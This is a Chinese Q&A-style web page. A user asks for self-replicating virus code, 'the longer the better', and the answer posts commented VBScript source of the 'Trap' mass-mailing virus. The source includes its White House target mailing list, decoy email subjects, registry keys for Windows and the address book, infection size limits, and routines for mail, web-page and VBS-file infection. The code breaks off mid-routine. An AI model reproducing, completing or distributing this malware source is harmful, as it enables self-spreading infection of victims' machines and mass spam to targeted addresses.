给个C病毒代码.....要复制的....越长越好

‘借刀杀人’,病毒名称“陷阱”On Error Resume Next Dim vbscr, fso, w1, w2, MSWKEY, HCUW, Code_Str, Vbs_Str, Js_Str Dim defpath, smailc, MAX_SIZE Dim whb(), title(10)smailc = 4 Redim whb(smailc)’白宫相关人员邮件名单 whb(0) = "president@whitehouse.gov"whb(1) ...
给个C病毒代码.....要复制的....越长越好
下面详细揭秘了“陷阱”病毒的发作过程和源代码。病毒具有自身加密能力,使用JavaScript编码技术,使普通用户无法直接看到病毒的原始代码,但在被感染的VBS文件中并未加密,因此作为一个入口点,作者轻松获得了所有源代码。

“陷阱”病毒的代码如下:

‘借刀杀人’,病毒名称“陷阱”

On Error Resume Next

Dim vbscr, fso, w1, w2, MSWKEY, HCUW, Code_Str, Vbs_Str, Js_Str

Dim defpath, smailc, MAX_SIZE

Dim whb(), title(10)

smailc = 4

Redim whb(smailc)

’白宫相关人员邮件名单

whb(0) = "president@whitehouse.gov"

whb(1) = "vice.president@whitehouse.gov "

whb(2) = "first.lady@whitehouse.gov"

whb(3) = "mrs.cheney@whitehouse.gov"

’发送邮件的主题

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:\Readme.html"

’病毒文件

MAX_SIZE = 100000

’定义传染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"

HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"

Main

Sub main()

On Error Resume Next

Dim w_s

w_s = WScript.ScriptFullName

’得到病毒文件本身的路径

if w_s = "" then

Err.Clear

Set fso = CreateObject("Scripting.FileSystemObject")

’创建文件系统对象

if getErr then

’辨认病毒状态

Randomize

’初始化随机种子

ra = int(rnd() * 7)

’产生随机数

document.write title(ra)

’ 写随机内容

ExecuteMail

’执行邮件状态时的程序

else

ExecutePage

’执行 WEB 页状态时的程序

end if

else

ExecuteVbs

’执行 VBS 文件状态时的程序

e2024-12-01
mengvlog 阅读 58 次 更新于 2025-12-14 04:38:09 我来答关注问题0
檬味博客在线解答立即免费咨询

代码相关话题

Copyright © 2023 WWW.MENGVLOG.COM - 檬味博客
返回顶部